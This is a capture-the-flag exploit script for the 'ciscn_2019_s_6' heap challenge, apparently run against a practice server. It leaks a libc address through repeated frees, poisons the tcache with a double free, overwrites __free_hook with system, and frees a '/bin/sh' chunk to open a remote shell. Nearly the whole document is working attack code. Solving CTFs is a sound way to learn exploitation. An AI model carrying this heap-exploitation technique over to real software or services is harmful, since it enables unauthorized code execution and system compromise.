ciscn_2019_s_6

exp

from pwn_debug import *

# Target binary for pwntools' context; 'debug' logs every byte sent/received.
context.binary = './ciscn_s_6'
context.log_level = 'debug'

# Machine-specific paths (glibc-all-in-one layout) used only by the local
# harness; the remote run below does not read them.
_LIBC_PATH = '/home/ki/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so'
_LD_PATH = '/home/ki/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-linux-x86-64.so.2'

pdbg = pwn_debug('./ciscn_s_6')
pdbg.local(_LIBC_PATH, _LD_PATH)
pdbg.remote('node3.buuoj.cn', 29810)

# The author left pdbg.run('local'), pdbg.libc and pdbg.elf commented out as
# the local alternatives to the three statements below.
p = pdbg.run('remote')
libc = ELF('./libc/libc-2.27.so')
elf = ELF('./ciscn_s_6')

def add(size, name, number):
    """Menu option 1: create an entry with the given name size, name and call number.

    ``size`` is sent as a decimal string after the size prompt.  ``name`` and
    ``number`` go through ``sendafter`` (no trailing newline), so a caller
    passes exactly the bytes the binary should read, e.g. a ``p64`` value or a
    NUL-terminated string.  Uses the module-level connection ``p``; no
    response is checked.
    """
    send_line = p.sendlineafter
    send_raw = p.sendafter
    send_line('choice:', '1')
    send_line("Please input the size of compary's name", str(size))
    send_raw('please input name:', name)
    send_raw('please input compary call:', number)
    
def show(idx):
    """Menu option 2: ask the binary to print the entry at ``idx``.

    Only sends the two menu replies on the module-level connection ``p``;
    reading the output is left to the caller.
    """
    for prompt, reply in (('choice:', '2'), ('Please input the index:', str(idx))):
        p.sendlineafter(prompt, reply)

def delete(idx):
    """Menu option 3: delete the entry at ``idx``.

    Sends the two menu replies on the module-level connection ``p``; the
    script below calls this repeatedly on the same index and nothing here
    checks how the binary answers.
    """
    for prompt, reply in (('choice:', '3'), ('Please input the index:', str(idx))):
        p.sendlineafter(prompt, reply)

# Two entries: index 0 with a 0x90-byte name, index 1 with a 0x20-byte name.
add(0x90, 'aaaa', '1111')  # 0
add(0x20, 'bbbb', '1111')  # 1

# Index 0 is deleted eight times in total (7 in the author's loop + 1), then
# displayed; the name field that comes back is read as a 6-byte pointer.
for _ in range(8):
    delete(0)
show(0)

p.recvuntil('name:')
leak = p.recvuntil('\x7f')[-6:]
unsorted_addr = u64(leak.ljust(8, '\x00'))
print('unsorted_addr:' + hex(unsorted_addr))

# 0x3ebca0 is a hard-coded offset for the libc-2.27 build loaded above; the
# other two addresses are taken from that ELF's symbol table.
libcbase = unsorted_addr - 0x3ebca0
free_hook = libcbase + libc.symbols['__free_hook']
system = libcbase + libc.symbols['system']
print('free_hook:' + hex(free_hook))
print('system:' + hex(system))

# Index 1 is deleted twice, then four 0x20 entries are created whose name
# fields are the two computed addresses and a NUL-terminated "/bin/sh".
delete(1)
delete(1)

add(0x20, p64(free_hook), '1111')  # 2
add(0x20, 'bbbb', '1111')          # 3
add(0x20, p64(system), '1111')     # 4
add(0x20, '/bin/sh\x00', '1111')   # 5
delete(5)
# gdb.attach(p)  # left by the author for local debugging

p.interactive()